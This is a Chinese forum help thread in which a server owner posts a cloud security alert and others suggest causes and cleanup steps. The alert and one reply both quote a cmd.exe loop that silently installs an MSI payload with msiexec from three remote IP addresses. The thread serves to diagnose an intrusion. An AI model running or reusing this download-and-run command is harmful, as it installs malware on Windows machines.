服务器报恶意下载源

sanpu · 发表于 2020-8-21 07:52

本帖最后由 sanpu 于 2020-8-21 07:58 编辑

[url=]备注[/url]处理
该告警由如下引擎检测发现：
父进程路径: C:/Windows/System32/cmd.exe
父进程命令行: "C:\Windows\System32\cmd.exe" /c for /d %i in (113.230.237.7:16869 1.248.75.8:17182 218.4.111.170:16142) do Msiexec /i http://%i/785AD053.moe /Q
父进程id: 460
进程ID: 4204
URL链接: http://218.4.111.170:16142/785ad053.moe
命令行参数: Msiexec /i http://218.4.111.170:16142/785AD053.moe /Q
与该URL有关联的漏洞: None
事件说明: 云盾检测到您的服务器正在尝试访问一个可疑恶意下载源，可能是黑客通过指令从远程服务器下载恶意文件，危害服务器安全。如果该指令不是您自己运行，请及时排查入侵原因，例如查看本机的计划任务、发起对外连接的父子进程。
解决方案: 请及时排查告警中提示的恶意URL，以及所下载的目录下的恶意文件，并及时清理已运行的恶意进程。如果该指令是您自己主动执行的，您可以在控制台点击标记为误报。

求助大佬

刀大喵 · 发表于 2020-8-21 08:18

本帖最后由刀大喵于 2020-8-21 08:19 编辑

调用cmd 下载并安装 http://218.4.111.170:16142/785AD053.moe /Q Q文件下载后直接被火绒拦截报毒
大佬可以分析下该文件另楼主发错板块了吧

流云削峰 · 发表于 2020-8-21 08:23

03的服务器？
1.服务器中毒了
2.有软件更新
3.你安装了软件
看着命名好像是中毒了
小白分析，启动大佬给你帮助。

爱新觉罗罹江 · 发表于 2020-8-21 08:37

113.230.237.7
218.4.111.170
1.248.75.8
在微步上查看均为恶意地址，可以直接把这三个加进黑名单。
https://x.threatbook.cn/
另外你可能存在远程命令执行漏洞，对方直接调用cmd命令从以上三个地址进行windows installer下载785AD053.moe /Q文件。仔细查看一下自己的应用和系统漏洞。
"C:\Windows\System32\cmd.exe" /c for /d %i in (113.230.237.7:16869 1.248.75.8:17182 218.4.111.170:16142) do Msiexec /i http://%i/785AD053.moe /Q

小妹の大白腿 · 发表于 2020-8-21 09:30

还是火绒好

JuncoJet · 发表于 2020-8-21 09:44

下载者而已，下载了个MSI安装包

sanpu · 发表于 2020-8-21 09:58

爱新觉罗罹江发表于 2020-8-21 08:37
113.230.237.7
218.4.111.170
1.248.75.8

这个服务器只有一个数据库应该查看应用的那些方面或怎么着手呢

爱新觉罗罹江 · 发表于 2020-8-21 11:54

sanpu 发表于 2020-8-21 09:58
这个服务器只有一个数据库应该查看应用的那些方面或怎么着手呢

如果有杀毒软件，90%的问题更新杀毒库后就可以进行杀毒解决。
杀毒结束后重启再杀。如果不能重启，且没有杀软的话，建议查看可以进程，看看是否对注册列表进行可以的修改。

帐号		自动登录	找回密码
密码			注册[Register]

[求助] 服务器报恶意下载源